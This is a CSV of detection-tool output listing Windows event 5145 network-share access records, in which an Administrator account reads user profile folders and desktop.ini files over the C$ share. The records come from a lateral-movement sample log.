2019-03-18 23:23:23.676 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admin01\Saved Games | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.686 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admin01\Searches | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.686 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admin01\Videos | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.686 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.686 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Contacts\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.686 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Desktop\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.686 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Documents\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.696 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Downloads\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.696 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Favorites\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.696 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Links\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.696 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Music\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.706 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Pictures\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.706 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Saved Games\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.706 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Searches\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.706 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Videos\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.706 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Contacts | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.706 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Desktop | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.716 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Documents | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.716 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Downloads | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.716 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Favorites | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.716 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Favorites\Links\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.716 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Favorites\Links for United States\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.727 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Favorites\Links | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.727 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Favorites\Links for United States | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.727 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Links | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.727 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Music | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.727 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Pictures | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.727 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Saved Games | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.737 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Searches | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.737 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Videos | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.737 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator.EXAMPLE | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.737 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator.EXAMPLE\Contacts\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.737 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator.EXAMPLE\Desktop\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.737 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator.EXAMPLE\Documents\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.747 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator.EXAMPLE\Downloads\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.747 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator.EXAMPLE\Favorites\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.747 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator.EXAMPLE\Links\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.747 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator.EXAMPLE\Music\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.747 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator.EXAMPLE\Pictures\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.757 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator.EXAMPLE\Saved Games\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.757 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator.EXAMPLE\Searches\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.757 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator.EXAMPLE\Videos\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.757 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator.EXAMPLE\Contacts | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.757 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator.EXAMPLE\Desktop | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.767 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator.EXAMPLE\Documents | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.767 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator.EXAMPLE\Downloads | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.767 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator.EXAMPLE\Favorites | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.767 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator.EXAMPLE\Favorites\Links\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.767 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator.EXAMPLE\Favorites\Links for United States\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.777 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator.EXAMPLE\Favorites\Links | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.777 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator.EXAMPLE\Favorites\Links for United States | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.777 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator.EXAMPLE\Links | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.777 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator.EXAMPLE\Music | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.777 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator.EXAMPLE\Pictures | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.777 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator.EXAMPLE\Saved Games | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.787 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator.EXAMPLE\Searches | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.787 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator.EXAMPLE\Videos | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.787 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.797 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Contacts\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.797 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Desktop\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.797 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Documents\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.807 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Downloads\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.807 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Favorites\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.807 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Links\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.807 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Music\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.807 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Pictures\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.817 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Saved Games\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
